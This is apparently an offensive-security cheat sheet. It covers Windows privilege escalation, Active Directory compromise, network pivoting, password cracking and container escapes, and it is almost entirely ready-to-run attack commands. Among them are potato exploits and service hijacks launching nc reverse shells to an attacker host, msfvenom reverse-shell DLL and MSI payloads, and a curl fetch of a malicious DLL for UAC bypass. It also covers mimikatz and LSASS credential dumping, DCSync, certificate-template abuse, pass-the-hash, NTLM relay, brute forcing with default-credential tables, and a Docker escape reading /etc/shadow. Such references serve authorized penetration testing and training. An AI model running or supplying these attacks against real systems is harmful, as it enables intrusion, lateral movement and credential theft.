Manual Enumeration

powershell

# System info
systeminfo
hostname
[environment]::OSVersion.Version
 
# Current user
whoami
whoami /priv
whoami /groups
net user %USERNAME%
 
# All users & groups
net user
net localgroup
net localgroup administrators
 
# Network
ipconfig /all
route print
arp -a
netstat -ano
 
# Processes & services
tasklist /svc
Get-Process
Get-Service
wmic service get name,displayname,pathname,startmode
 
# Installed software
wmic product get name,version
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*
 
# Patches
wmic qfe
Get-HotFix
 
# Scheduled tasks
schtasks /query /fo LIST /v
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
 
# Password policy
net accounts
 
# AV status
Get-MpComputerStatus
sc query windefend

Token Privileges

SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege

powershell

# Check
whoami /priv
 
# Potato attacks (pick based on OS)
# JuicyPotato — Server 2016/2019, Win 10 < 1809
.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe LHOST 4444 -e cmd.exe" -t *
 
# PrintSpoofer — Win 10 / Server 2019+
.\PrintSpoofer.exe -i -c cmd
.\PrintSpoofer.exe -c "c:\temp\nc.exe LHOST 4444 -e cmd"
 
# GodPotato — Universal (Win 8-11, Server 2012-2022)
.\GodPotato.exe -cmd "cmd /c c:\temp\nc.exe LHOST 4444 -e cmd"
 
# SweetPotato
.\SweetPotato.exe -p c:\temp\nc.exe -a "LHOST 4444 -e cmd"

CoercedPotato (when Print Spooler is stopped)

powershell

.\CoercedPotato.exe -cmd "cmd /c whoami"
.\CoercedPotato.exe --revshell -l LHOST -p LPORT

EfsPotato (MS-EFSR based)

powershell

.\EfsPotato.exe "whoami"

SigmaPotato (in-memory, .NET reflection)

powershell

.\SigmaPotato.exe --revshell LHOST LPORT

Potato Family Quick Reference

Tool	Target OS	When to Use
GodPotato	Win 8-11, Server 2012-2022	Universal first try
PrintSpoofer	Win 10/Server 2019+	Spooler running
CoercedPotato	Modern Windows	Spooler stopped
SigmaPotato	Multiple	Need in-memory execution
JuicyPotato	Server 2016/2019, Win 10 < 1809	Old systems
SweetPotato	Multiple	Alternative
RoguePotato	Multiple	Outbound SMB allowed
EfsPotato	Multiple	EFS-based

SeBackupPrivilege

powershell

# Copy SAM and SYSTEM
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
 
# Extract hashes on attacker
secretsdump.py -sam SAM -system SYSTEM LOCAL
 
# Or copy ntds.dit from DC
robocopy /B C:\Windows\NTDS .\ntds ntds.dit

SeTakeOwnershipPrivilege

powershell

takeown /f C:\Windows\System32\config\SAM
icacls C:\Windows\System32\config\SAM /grant %USERNAME%:F

SeDebugPrivilege

powershell

# Dump LSASS
procdump.exe -accepteula -ma lsass.exe lsass.dmp
 
# Or use mimikatz
privilege::debug
sekurlsa::logonpasswords

Service Exploits

Unquoted Service Paths

powershell

# Find
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
 
# Exploit — place binary in writable path segment
# C:\Program Files\My App\Service.exe
# → Try placing: C:\Program.exe or C:\Program Files\My.exe

Weak Service Permissions

powershell

# Check with accesschk
accesschk.exe /accepteula -uwcqv "Everyone" *
accesschk.exe /accepteula -uwcqv "Users" *
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
 
# Modify service binary
sc config <service> binPath= "cmd /c net localgroup administrators <user> /add"
sc stop <service>
sc start <service>
 
# Or point to reverse shell
sc config <service> binPath= "C:\temp\nc.exe LHOST 4444 -e cmd.exe"

Weak Registry Permissions

powershell

# Check
accesschk.exe /accepteula -kvuqsw hklm\System\CurrentControlSet\Services
 
# Modify
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\<service> -Name "ImagePath" -Value "C:\temp\nc.exe LHOST 4444 -e cmd"

DLL Hijacking

powershell

# Find missing DLLs
# Use Process Monitor (procmon) to filter:
#   Operation = CreateFile, Result = NAME NOT FOUND, Path ends with .dll
 
# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f dll -o hijack.dll
 
# Place in writable directory that's in the DLL search order

AlwaysInstallElevated

powershell

# Check (both must be set to 1)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 
# Exploit
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f msi -o shell.msi
msiexec /quiet /qn /i shell.msi

Stored Credentials

powershell

# Saved credentials
cmdkey /list
 
# Use saved creds
runas /savecred /user:admin cmd.exe
 
# AutoLogon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
 
# Unattend files
dir /s /b C:\*unattend*.xml C:\*sysprep*.xml C:\*unattended*.xml 2>nul
 
# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
 
# IIS config
type C:\inetpub\wwwroot\web.config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
 
# Credential files
dir /s /b C:\*.config C:\*.ini C:\*.txt C:\*.xml 2>nul | findstr /i "pass cred"
 
# WiFi passwords
netsh wlan show profile
netsh wlan show profile <SSID> key=clear
 
# DPAPI
mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\<file>

UAC Bypass

powershell

# Check UAC level
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
 
# DLL hijacking UAC bypass (e.g., SystemPropertiesAdvanced.exe)
# Place malicious srrstr.dll in user's WindowsApps folder
curl http://LHOST/srrstr.dll -o C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll
SystemPropertiesAdvanced.exe

Credential Extraction

powershell

# Mimikatz
privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
lsadump::sam
lsadump::dcsync /user:Administrator
 
# SAM dump
reg save HKLM\SAM SAM
reg save HKLM\SYSTEM SYSTEM
# On attacker: secretsdump.py -sam SAM -system SYSTEM LOCAL
 
# LSASS dump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Or: Task Manager → lsass.exe → Create Dump File
# Then: mimikatz # sekurlsa::minidump lsass.dmp
#        mimikatz # sekurlsa::logonpasswords

Kernel Exploits

powershell

# Check for suggestions
.\windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt
 
# Or use Watson
.\Watson.exe

Windows Privesc Checklist

whoami /priv — SeImpersonate → Potato
Stored creds / runas /savecred
Service misconfigs — unquoted paths, weak perms
AlwaysInstallElevated
Scheduled tasks — writable scripts
Credential hunting — history, configs, DPAPI
DLL hijacking opportunities
Kernel exploits (last resort)

7. Active Directory Attacks

Initial Enumeration

bash

# Null session / anonymous enumeration
netexec smb $IP -u '' -p ''
netexec smb $IP -u 'guest' -p ''
enum4linux -a $IP
rpcclient -U "" -N $IP
 
# RID cycling (find users from null session)
netexec smb $IP -u '' -p '' --rid-brute
lookupsid.py anonymous@$IP -no-pass
 
# LDAP anonymous bind
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=com"
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName
 
# DNS
dig @$IP domain.com any
dig @$IP -x $IP

User Enumeration

bash

# Kerbrute (no creds needed)
kerbrute userenum -d domain.com --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
 
# Validate creds
netexec smb $IP -u user -p 'password'
netexec ldap $IP -u user -p 'password'
netexec winrm $IP -u user -p 'password'
 
# Enumerate users with creds
netexec smb $IP -u user -p pass --users
GetADUsers.py -all domain.com/user:pass -dc-ip $IP

Password Attacks

AS-REP Roasting

bash

# Find AS-REP roastable users (no creds)
GetNPUsers.py domain.com/ -usersfile users.txt -no-pass -dc-ip $IP
GetNPUsers.py domain.com/ -no-pass -dc-ip $IP  # auto-find if LDAP allows
 
# With creds
GetNPUsers.py domain.com/user:pass -request -dc-ip $IP
 
# Crack
hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt

Kerberoasting

bash

# Requires valid domain creds
GetUserSPNs.py domain.com/user:pass -dc-ip $IP -request
GetUserSPNs.py domain.com/user:pass -dc-ip $IP -request -outputfile kerb.hash
 
# Crack
hashcat -m 13100 kerb.hash /usr/share/wordlists/rockyou.txt

Password Spraying

bash

# SMB
netexec smb $IP -u users.txt -p 'Password1' --continue-on-success
netexec smb $IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
 
# Kerbrute (faster, less noise)
kerbrute passwordspray -d domain.com --dc $IP users.txt 'Password1'
 
# Be careful with lockout policies!
net accounts /domain
# Or: netexec smb $IP -u user -p pass --pass-pol

BloodHound

bash

# Collection
bloodhound-python -u user -p pass -d domain.com -c all -ns $IP
# Or on target:
.\SharpHound.exe -c all --zipfilename bh.zip
 
# Start BloodHound
sudo neo4j start
bloodhound
 
# Key queries:
# - Find Shortest Paths to Domain Admins
# - Find AS-REP Roastable Users
# - Find Kerberoastable Users
# - Shortest Paths to Unconstrained Delegation
# - Find Principals with DCSync Rights

Lateral Movement

Pass-the-Hash

bash

# SMB exec
psexec.py -hashes :NTHASH domain.com/administrator@$IP
wmiexec.py -hashes :NTHASH domain.com/administrator@$IP
smbexec.py -hashes :NTHASH domain.com/administrator@$IP
atexec.py -hashes :NTHASH domain.com/administrator@$IP 'whoami'
 
# WinRM
evil-winrm -i $IP -u administrator -H NTHASH
 
# NetExec
netexec smb $IP -u administrator -H NTHASH -x 'whoami'
netexec winrm $IP -u administrator -H NTHASH -x 'whoami'

Pass-the-Ticket

bash

# Export ticket from mimikatz
sekurlsa::tickets /export
 
# Inject ticket
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py -k -no-pass domain.com/user@target.domain.com
 
# Convert kirbi to ccache
ticketConverter.py ticket.kirbi ticket.ccache

WinRM

bash

evil-winrm -i $IP -u user -p 'password'
evil-winrm -i $IP -u user -H NTHASH

RDP

bash

xfreerdp /v:$IP /u:user /p:'password' /cert-ignore +clipboard /dynamic-resolution
xfreerdp /v:$IP /u:user /pth:NTHASH /cert-ignore   # PtH over RDP

ADCS (Active Directory Certificate Services)

bash

# Enumerate ALL vulnerable templates
certipy find -u user@domain.com -p 'pass' -dc-ip $IP -vulnerable
certipy find -u user@domain.com -p 'pass' -dc-ip $IP -vulnerable -stdout

ESC1 — Enrollee Supplies SAN

bash

certipy req -u user@domain.com -p 'pass' -ca 'CA-NAME' \
  -template 'VulnTemplate' -upn 'administrator@domain.com' -dc-ip $IP

ESC3 — Enrollment Agent Template

bash

certipy req -u user@domain.com -p 'pass' -ca CA-NAME -template EnrollmentAgent -dc-ip $IP
certipy req -u user@domain.com -on-behalf-of 'domain\administrator' \
  -pfx user.pfx -template User -ca CA-NAME -dc-ip $IP

ESC4 — Vulnerable Template ACL

bash

certipy template -u user@domain.com -p 'pass' -template VulnTemplate -save-old -dc-ip $IP
# Modify template to ESC1 conditions, exploit, then restore:
certipy template -u user@domain.com -p 'pass' -template VulnTemplate \
  -configuration VulnTemplate.json -dc-ip $IP

ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 on CA

bash

certipy req -u user@domain.com -p 'pass' -ca CA-NAME \
  -template User -upn administrator@domain.com -dc-ip $IP

ESC7 — Vulnerable CA ACL (ManageCA + ManageCertificates)

bash

certipy ca -ca CA-NAME -add-officer user -u user@domain.com -p 'pass' -dc-ip $IP
certipy ca -ca CA-NAME -enable-template SubCA -u user@domain.com -p 'pass' -dc-ip $IP
certipy req -u user@domain.com -p 'pass' -ca CA-NAME \
  -template SubCA -upn administrator@domain.com -dc-ip $IP
certipy ca -ca CA-NAME -issue-request <ID> -u user@domain.com -p 'pass' -dc-ip $IP
certipy req -u user@domain.com -p 'pass' -ca CA-NAME -retrieve <ID> -dc-ip $IP

ESC8 — NTLM Relay to HTTP Enrollment

bash

certipy relay -ca ca.domain.com -template DomainController
# Combine with coercion (PetitPotam/DFSCoerce/PrinterBug)

ESC9 — No Security Extension + StrongCertificateBindingEnforcement=1

bash

# Change UPN of controlled user to target, request cert, change UPN back
certipy shadow auto -u user@domain.com -p 'pass' -account victim -dc-ip $IP

ESC10 — Weak Certificate Mapping

bash

certipy req -u user@domain.com -p 'pass' -ca CA-NAME \
  -template VulnTemplate -upn administrator@domain.com -dc-ip $IP

ESC11 — ICPR Without Encryption (RPC-based ESC8)

bash

certipy relay -ca ca.domain.com -template DomainController

ESC12 — CA Key Extraction (requires shell on CA)

bash

certipy ca -backup -u user@domain.com -p 'pass' -ca CA-NAME -dc-ip $IP -target $CA_HOST
certipy forge -ca-pfx CA-NAME.pfx -upn administrator@domain.com -subject 'CN=Administrator'

ESC13 — Issuance Policy Linked to Group

bash

certipy req -u user@domain.com -p 'pass' -ca CA-NAME -template ESC13Template -dc-ip $IP

ESC14 — Explicit Certificate Mapping

bash

certipy req -target $CA_HOST -u 'machine$@domain.com' -p 'pass' \
  -dc-ip $IP -template Machine -ca CA-NAME

ESC15 — Application Policies Override EKU

bash

certipy req -u user@domain.com -p 'pass' \
  --application-policies "1.3.6.1.4.1.311.20.2.1" \
  -ca CA-NAME -template WebServer -dc-ip $IP

Authenticate with Certificate

bash

certipy auth -pfx administrator.pfx -dc-ip $IP
certipy auth -pfx administrator.pfx -dc-ip $IP -ldap-shell

Shadow Credentials (msDS-KeyCredentialLink)

bash

# Requires: GenericWrite on target + Domain Functional Level >= 2016
 
# pyWhisker
python3 pywhisker.py -d domain.com -u attacker -p 'pass' --target victim --action add
# Outputs PFX file + password
 
# Authenticate with certificate
python3 gettgtpkinit.py -cert-pfx victim.pfx -pfx-pass <password> domain.com/victim victim.ccache
export KRB5CCNAME=victim.ccache
python3 getnthash.py -key <AS-REP-key> domain.com/victim
 
# Certipy (one-shot)
certipy shadow auto -u attacker@domain.com -p 'pass' -account victim -dc-ip $IP
 
# Cleanup
python3 pywhisker.py -d domain.com -u attacker -p 'pass' --target victim --action remove -D <DeviceID>

DCSync

bash

# Requires: DS-Replication-Get-Changes + DS-Replication-Get-Changes-All
secretsdump.py domain.com/user:pass@$IP
secretsdump.py -hashes :NTHASH domain.com/user@$IP
 
# Specific user
secretsdump.py domain.com/user:pass@$IP -just-dc-user administrator
 
# Mimikatz
lsadump::dcsync /domain:domain.com /user:administrator

ACL Abuse

Common Abusable ACEs

Right	Abuse
GenericAll	Reset password, add to group, write SPN for kerberoast
GenericWrite	Write SPN, modify logon script, add shadow creds
WriteOwner	Take ownership → modify DACL
WriteDACL	Grant yourself GenericAll
ForceChangePassword	Reset target's password
AddMember	Add yourself to a group
ReadLAPSPassword	Read local admin password

Exploitation

bash

# ForceChangePassword
net rpc password "target_user" "newpassword" -U "domain.com/user%pass" -S $IP
rpcclient -U "user%pass" $IP -c "setuserinfo2 target_user 23 'NewPass123!'"
 
# Add to group
net rpc group addmem "Domain Admins" "user" -U "domain.com/user%pass" -S $IP
 
# Set SPN for Kerberoasting
setspn -a MSSQLSvc/fake:1433 target_user  # from Windows
 
# Shadow Credentials
certipy shadow auto -u user@domain.com -p 'pass' -account 'target_user'

Delegation Attacks

Unconstrained Delegation

bash

# Find
Get-ADComputer -Filter {TrustedForDelegation -eq $true}
# In BloodHound: MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
 
# Exploit: coerce auth + capture TGT
# Use Rubeus monitor + SpoolSample/PetitPotam/PrinterBug
Rubeus.exe monitor /interval:5 /nowrap
SpoolSample.exe dc.domain.com unconstrained-host.domain.com
Rubeus.exe ptt /ticket:<base64_ticket>

Constrained Delegation

bash

# Find
Get-ADUser -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
 
# Exploit with impacket
getST.py -spn 'cifs/target.domain.com' -impersonate administrator domain.com/svc_user:pass
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass target.domain.com

Resource-Based Constrained Delegation (RBCD)

bash

# Requires: GenericWrite/GenericAll on target computer
# Add machine account
addcomputer.py domain.com/user:pass -computer-name 'FAKE$' -computer-pass 'FakePass123!'
 
# Set msDS-AllowedToActOnBehalfOfOtherIdentity
rbcd.py -action write -delegate-from 'FAKE$' -delegate-to 'TARGET$' domain.com/user:pass
 
# Get service ticket
getST.py -spn 'cifs/target.domain.com' -impersonate administrator domain.com/'FAKE$':'FakePass123!'
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass target.domain.com

Credential Dumping

bash

# Remote
secretsdump.py domain.com/admin:pass@$IP
secretsdump.py -hashes :NTHASH domain.com/admin@$IP
 
# Local (on target)
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
mimikatz # lsadump::lsa /patch
mimikatz # lsadump::dcsync /domain:domain.com /all
 
# LAPS passwords
netexec ldap $IP -u user -p pass -M laps
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | where {$_."ms-Mcs-AdmPwd" -ne $null}
 
# gMSA passwords
netexec ldap $IP -u user -p pass --gmsa

New Impacket Tools (v0.12+)

bash

# dacledit.py — Read/write/remove ACEs in DACLs
dacledit.py -action read -target 'CN=victim,DC=corp,DC=local' domain/user:pass
dacledit.py -action write -rights DCSync -principal attacker -target-dn 'DC=corp,DC=local' domain/user:pass
 
# owneredit.py — Abuse WriteOwner
owneredit.py -action write -new-owner attacker -target victim domain/user:pass
 
# GetLAPSPassword.py — Extract LAPS passwords
GetLAPSPassword.py -dc-ip $IP domain/user:pass
 
# describeTicket.py — Analyze Kerberos tickets
describeTicket.py ticket.ccache
 
# regsecrets.py — Extract LSA secrets via remote registry
regsecrets.py domain/user:pass@$IP

AD Attack Flow

Enumerate — null sessions, RID cycling, kerbrute
AS-REP Roast — no creds needed
Password Spray — common passwords against user list
Kerberoast — with first valid creds
BloodHound — map ACL attack paths
ADCS — check for vulnerable certificate templates (ESC1-ESC15)
Shadow Credentials — if GenericWrite on targets
ACL Abuse — follow BloodHound paths
Delegation — unconstrained/constrained/RBCD
DCSync — dump all domain hashes

8. Pivoting & Tunneling

Network Discovery from Pivot Host

bash

# Find live hosts
for i in $(seq 1 254); do (ping -c 1 172.16.1.$i | grep "bytes from" &); done
 
# ARP scan
arp -a
ip neigh
 
# Port scan without nmap
for port in 21 22 23 25 53 80 88 110 135 139 143 389 443 445 636 1433 3306 3389 5985 8080; do
    (echo >/dev/tcp/172.16.1.10/$port) 2>/dev/null && echo "Port $port open"
done
 
# With nmap through proxy
proxychains nmap -sT -Pn -p 21,22,80,88,135,139,389,443,445,1433,3306,3389,5985 172.16.1.0/24
 
# Discover subnets from routing table
ip route
route -n
cat /etc/network/interfaces
cat /etc/resolv.conf

SSH Tunneling

Local Port Forward

bash

# Access remote service through SSH host
# Syntax: ssh -L [local_addr:]local_port:remote_host:remote_port user@ssh_host
ssh -L 8080:172.16.1.10:80 user@$IP
 
# Access internal web server
ssh -L 80:internal.server:80 user@$IP
# Then browse: http://localhost:80
 
# Multiple forwards
ssh -L 8080:10.10.1.5:80 -L 3389:10.10.1.5:3389 user@$IP

Dynamic Port Forward (SOCKS Proxy)

bash

# Create SOCKS proxy
ssh -D 1080 user@$IP -N -f
 
# Use with proxychains
# Edit /etc/proxychains4.conf: socks5 127.0.0.1 1080
proxychains nmap -sT -Pn 172.16.1.0/24
proxychains curl http://172.16.1.10
proxychains evil-winrm -i 172.16.1.10 -u admin -p pass

Remote Port Forward

bash

# Expose attacker's port to target network
ssh -R 9001:localhost:9001 user@$IP
 
# Reverse SOCKS
ssh -R 1080 user@$IP

Chisel

Setup

bash

# Attacker (server)
./chisel server --reverse --port 9001
 
# Target (client) — reverse SOCKS proxy
./chisel client LHOST:9001 R:socks
 
# Target (client) — specific port forward
./chisel client LHOST:9001 R:8080:127.0.0.1:8080
./chisel client LHOST:9001 R:445:172.16.1.10:445

Double Pivot

bash

# First hop
# Attacker: chisel server --reverse --port 9001
# Pivot1: ./chisel client LHOST:9001 R:socks
 
# Second hop
# Pivot1: ./chisel server --reverse --port 9002
# Pivot2: ./chisel client Pivot1_IP:9002 R:socks
 
# Configure proxychains for double pivot
# /etc/proxychains4.conf:
# socks5 127.0.0.1 1080   (first hop)
# socks5 127.0.0.1 1081   (second hop)

Ligolo-ng

Setup

bash

# Attacker (proxy server)
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601
 
# Target (agent)
./agent -connect LHOST:11601 -ignore-cert

Usage

bash

# In ligolo console
session                         # List/select sessions
ifconfig                        # Show target interfaces
 
# Add route for target's internal network
sudo ip route add 172.16.1.0/24 dev ligolo
 
start                           # Start tunnel
 
# Now access internal hosts directly (no proxychains needed!)
nmap -sT -Pn 172.16.1.10
curl http://172.16.1.10
evil-winrm -i 172.16.1.10 -u admin -p pass
 
# Listener (catch reverse shell through tunnel)
listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp

Double Pivot with Ligolo

bash

# After first tunnel is running, upload agent to second pivot host
# On pivot2: ./agent -connect PIVOT1_INTERNAL_IP:11601 -ignore-cert
# Add listener on first agent: listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
# Select new session, add route for third subnet, start

socat

bash

# Port forward
socat TCP-LISTEN:8080,fork TCP:172.16.1.10:80
 
# Reverse shell relay
# Attacker: nc -lvnp 4444
# Pivot: socat TCP-LISTEN:4444,fork TCP:LHOST:4444
# Target: bash -i >& /dev/tcp/PIVOT_IP/4444 0>&1

Proxychains

bash

# Edit /etc/proxychains4.conf
# socks5 127.0.0.1 1080
 
# Use with tools
proxychains nmap -sT -Pn $INTERNAL_IP
proxychains curl http://$INTERNAL_IP
proxychains evil-winrm -i $INTERNAL_IP -u admin -p pass

NTLM Relay

bash

# Disable SMB signing check
netexec smb 172.16.1.0/24 --gen-relay-list relay_targets.txt
 
# Relay to targets
ntlmrelayx.py -tf relay_targets.txt -smb2support
 
# Coerce authentication
# PetitPotam
python3 PetitPotam.py LHOST $DC_IP
# PrinterBug
python3 printerbug.py domain.com/user:pass@$DC_IP LHOST
 
# Relay to LDAP (for RBCD or shadow creds)
ntlmrelayx.py -t ldap://$DC_IP --delegate-access
ntlmrelayx.py -t ldap://$DC_IP --shadow-credentials

Responder (Credential Capture)

bash

# Listen for LLMNR/NBT-NS/mDNS
sudo responder -I eth0 -dwPv
 
# Captured hashes: /usr/share/responder/logs/
# Crack NetNTLMv2
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Pivoting Tips

Always check ip route and arp -a on every pivot host
Internal services (localhost-only) are goldmines — always check ss -tlnp
Try credentials from previous hosts on every new host (password reuse)
Upload a static nmap or use bash port scanner on pivot hosts
Ligolo-ng > Chisel for multi-pivot scenarios (no proxychains needed)
Document every subnet and host you discover

9. Password Cracking

Hash Identification

bash

# Tools
hashid 'HASH_STRING'
hash-identifier
hashcat --identify hash.txt

Common Hash Formats

Hash	Example	Length
MD5	`5d41402abc4b2a76b9719d911017c592`	32 hex
SHA1	`aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d`	40 hex
SHA256	`2cf24dba5fb0a30e26e83b2ac5b9e29e...`	64 hex
NTLM	`a4f49c406510bdcab6824ee7c30fd852`	32 hex
NetNTLMv2	`user::DOMAIN:challenge:response:blob`	Variable
bcrypt	`$2a$10$...` or `$2b$...`	60 chars
sha512crypt	`$6$salt$hash`	Starts with $6$
sha256crypt	`$5$salt$hash`	Starts with $5$
md5crypt	`$1$salt$hash`	Starts with $1$
Kerberos TGS	`$krb5tgs$23$*...`	Starts with $krb5tgs$
AS-REP	`$krb5asrep$23$...`	Starts with $krb5asrep$

Hashcat

Common Modes

Mode	Type
0	MD5
100	SHA1
1000	NTLM
1400	SHA256
1700	SHA512
1800	sha512crypt ($6$)
3200	bcrypt ($2*$)
5500	NetNTLMv1
5600	NetNTLMv2
13100	Kerberoast (TGS-REP etype 23)
18200	AS-REP Roast
19600	Kerberos TGS-REP etype 17 (AES128)
19700	Kerberos TGS-REP etype 18 (AES256)
22000	WPA-PBKDF2-PMKID+EAPOL
22911	RSA/DSA/EC/OpenSSH private key
16500	JWT
11600	7-Zip
13400	KeePass
26610	MetaMask Wallet
29700	KeePass 4

Basic Usage

bash

# Auto-detect hash type (hashcat 7.0+)
hashcat --identify hash.txt
hashcat hash.txt /usr/share/wordlists/rockyou.txt    # Auto-detect mode
 
# Dictionary attack
hashcat -m MODE hash.txt /usr/share/wordlists/rockyou.txt
 
# With rules
hashcat -m MODE hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
 
# Show cracked
hashcat -m MODE hash.txt --show
 
# Brute force
hashcat -m MODE hash.txt -a 3 ?a?a?a?a?a?a?a?a
 
# Hybrid (wordlist + mask)
hashcat -m MODE hash.txt -a 6 /usr/share/wordlists/rockyou.txt ?d?d?d
hashcat -m MODE hash.txt -a 7 ?d?d?d /usr/share/wordlists/rockyou.txt

Mask Charsets

Charset	Description
`?l`	Lowercase (a-z)
`?u`	Uppercase (A-Z)
`?d`	Digits (0-9)
`?s`	Special chars
`?a`	All printable
`?b`	Binary (0x00-0xff)

John the Ripper

bash

# Auto-detect hash type
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
 
# Specific format
john hash.txt --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt
john hash.txt --format=raw-sha1 --wordlist=/usr/share/wordlists/rockyou.txt
john hash.txt --format=nt --wordlist=/usr/share/wordlists/rockyou.txt
john hash.txt --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt
 
# Show cracked
john hash.txt --show
 
# With rules
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64

Hash Extraction Tools

bash

# SSH keys
ssh2john id_rsa > id_rsa.hash
 
# ZIP files
zip2john file.zip > zip.hash
 
# RAR files
rar2john file.rar > rar.hash
 
# KeePass
keepass2john database.kdbx > keepass.hash
 
# 7-Zip
7z2john file.7z > 7z.hash
 
# PDF
pdf2john file.pdf > pdf.hash
 
# Office docs
office2john file.docx > office.hash
 
# /etc/shadow
unshadow /etc/passwd /etc/shadow > unshadowed.txt

Wordlists

Standard

plaintext

/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
/usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt

Username Lists

plaintext

/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
/usr/share/seclists/Usernames/Names/names.txt
/usr/share/seclists/Usernames/cirt-default-usernames.txt

Custom Wordlist Generation

bash

# CeWL — scrape words from website
cewl http://$IP -d 3 -m 5 -w cewl.txt
 
# Username generation from names
username-anarchy -i names.txt > usernames.txt
 
# Crunch — pattern-based
crunch 8 8 -t Pass%%^^ -o custom.txt    # Pass + 2 digits + 2 specials
 
# Mutate with hashcat rules
hashcat --stdout wordlist.txt -r /usr/share/hashcat/rules/best64.rule > mutated.txt

Online Brute Force

Hydra

bash

# SSH
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://$IP
 
# FTP
hydra -l user -P /usr/share/wordlists/rockyou.txt ftp://$IP
 
# HTTP POST login
hydra -l admin -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
 
# HTTP Basic Auth
hydra -l admin -P /usr/share/wordlists/rockyou.txt $IP http-get /admin
 
# RDP
hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$IP
 
# SMB
hydra -l administrator -P /usr/share/wordlists/rockyou.txt smb://$IP
 
# MySQL
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://$IP

NetExec

bash

# SMB password spray
netexec smb $IP -u users.txt -p 'Password1' --continue-on-success
 
# Multiple passwords (no brute, one pass per user)
netexec smb $IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
 
# WinRM
netexec winrm $IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

Default Credentials

Always try these first:

Service	Username	Password
SSH	root, admin	root, admin, toor
MySQL	root	(empty), root, mysql
PostgreSQL	postgres	postgres
MSSQL	sa	(empty), sa
MongoDB	(none)	(none — no auth)
Tomcat	tomcat, admin	tomcat, admin, s3cret
Jenkins	admin	admin
WordPress	admin	admin
phpMyAdmin	root	(empty)
Redis	(none)	(none — no auth)
Elasticsearch	(none)	(none — no auth)

10. Cloud & Container Attacks

Docker Escape

bash

# Detect container
cat /proc/1/cgroup 2>/dev/null | grep -i docker
ls -la /.dockerenv
hostname    # random hex = likely container
 
# Docker socket escape (most common)
ls -la /var/run/docker.sock
docker -H unix:///var/run/docker.sock run -v /:/hostfs -it alpine chroot /hostfs bash
 
# Privileged container — cgroup release_agent
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd && echo "cat /etc/shadow > $host_path/output" >> /cmd
chmod a+x /cmd && sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 
# SYS_ADMIN capability escape
capsh --print | grep sys_admin
mount -t overlay overlay -o lowerdir=/,upperdir=/tmp/upper,workdir=/tmp/work /mnt
 
# Privileged + host PID namespace
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
 
